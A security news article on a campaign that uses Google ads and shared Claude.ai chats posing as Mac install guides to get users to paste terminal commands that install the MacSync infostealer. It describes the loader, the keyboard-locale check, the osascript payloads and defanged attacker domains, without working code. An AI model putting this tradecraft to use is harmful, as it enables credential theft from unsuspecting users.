A user, searching innocently for a Mac download of Claude, clicks a Google ad. The ad looks legitimate, pointing to claude.ai. What they don’t know is that the instructions they’re about to follow are a one-way ticket for malware onto their machine.
This isn’t your grandpa’s malvertising. Forget fake domains mimicking brand names; the latest wave of attacks is far more insidious, weaponizing legitimate AI chat platforms and a search giant’s advertising network to deliver infostealer malware directly onto macOS devices. The data-driven analyst in me sees a clear market dynamic at play: attackers are exploiting trust and convenience, and the financial incentives for stealing user credentials are as high as ever.
The Anatomy of the Deception
Security engineer Berk Albayrak first flagged this campaign, detailing how attackers are creating Claude.ai shared chats that masquerade as official installation guides for Claude on Mac. These aren’t just hastily thrown-together phishing pages. They are carefully crafted narratives, sometimes even attributed to ‘Apple Support.’ The chat guides users through the seemingly innocuous — but ultimately malicious — process of opening Terminal and pasting commands. This is where the ‘official’ look and feel abruptly evaporates, replaced by a silent download and execution of malware.
This campaign flips the script on traditional malvertising. Normally, the malicious actor hosts a lookalike domain. Here? The Google Ads actually point to Anthropic’s real domain, claude.ai. The danger lurks within. Attackers are piggybacking on the trusted infrastructure of AI platforms. This tactic, as BleepingComputer observed with a second, entirely separate infrastructure variant, use the public sharing feature of Claude.ai chats. It’s a chillingly efficient way to distribute malicious code because the initial entry point—the ad and the AI platform’s domain—appears entirely legitimate.
What’s Inside the Malicious Chat? The Payload Unpacked
When a user falls for the bait, the base64 encoded instructions within the shared Claude chat fetch an encoded shell script from attacker-controlled domains. These domains, like customroofingcontractors[.]com and bernasibutuwqu2[.]com, are themselves likely compromised or newly registered specifically for this operation. The initial script, often named loader.sh, is gunzip-compressed and designed for in-memory execution—making forensic analysis a nightmare. It leaves minimal traces on disk, a hallmark of advanced evasion techniques.
Here’s the kicker: one variant specifically checks the victim’s keyboard input source. If it detects Russian or CIS-region keyboards, it bails, sending a quiet status ping to the attacker. This isn’t random spraying; it’s targeted. The operators are selecting their marks, collecting vital information—external IP, hostname, OS version, keyboard locale—before deploying the final payload via macOS’s built-in osascript engine. This avoids dropping traditional executables, making detection even harder. It’s a strategic move, prioritizing stealth and efficacy over brute force.
The script then pulls down a second-stage payload and runs it through osascript, macOS’s built-in scripting engine. This gives the attacker remote code execution without ever dropping a traditional application or binary.
Another variant, identified by Albayrak, skips the profiling and goes straight for the jugular: harvesting browser credentials, cookies, and sensitive data from the macOS Keychain. Researchers have identified this particular payload as a variant of the MacSync macOS infostealer. The briskinternet[.]com domain associated with this variant was reportedly down, a common occurrence as infrastructure is identified and disrupted.
Why This AI-Centric Approach Matters
This isn’t an isolated incident. We saw similar tactics employed against ChatGPT and Grok users back in December. The pattern is clear: attackers are rapidly adapting to and exploiting the emerging AI ecosystem. The allure of AI-powered tools is massive, and their integration into user workflows creates new, fertile ground for exploitation. The market for stolen credentials, financial data, and personally identifiable information remains strong, making macOS devices—often perceived as secure—a lucrative target. This campaign underscores a fundamental shift where the very platforms designed to enhance productivity are being subverted for malicious ends.
My unique insight here? This trend isn’t just about bypassing traditional security software. It’s about bypassing human vigilance. By cloaking malicious instructions within the conversational, seemingly helpful context of an AI chatbot, attackers are tapping into a deep-seated trust that users have developed for these new tools. It’s a psychological exploit as much as a technical one.
For users seeking the official Claude app, the directive is simple: navigate directly to claude.ai. Avoid sponsored search results when looking for native applications. The legitimate Claude Code CLI is available through Anthropic’s official documentation, and critically, it does not involve pasting commands from a chat interface. In fact, any instructions asking you to run arbitrary terminal commands, regardless of their supposed source, should be met with extreme caution. The digital landscape is increasingly a trust paradox: we must trust legitimate platforms while remaining hyper-vigilant about how those platforms are being misused.
🧬 Related Insights
- Read more: Docker’s Sneaky Padding Trick: One Request Away from Host Takeover
- Read more: Disney’s New Face Tech: Creepy Surveillance or Convenient Entry?
Frequently Asked Questions
What does the Claude.ai malware do? The malware is an infostealer. It harvests browser credentials, cookies, and sensitive data from the macOS Keychain, then exfiltrates it to attacker-controlled servers.
How do I avoid this Mac malware? Always navigate directly to official websites (like claude.ai) rather than clicking sponsored ads. Be extremely cautious of any instructions asking you to paste commands into your Terminal, regardless of the source.
Is my Mac safe from this threat if I don’t use Claude? While this specific campaign targets Claude users, the underlying tactic of using AI chats and Google Ads for malware distribution is a growing trend. Users of other AI platforms or those searching for software downloads should remain vigilant.
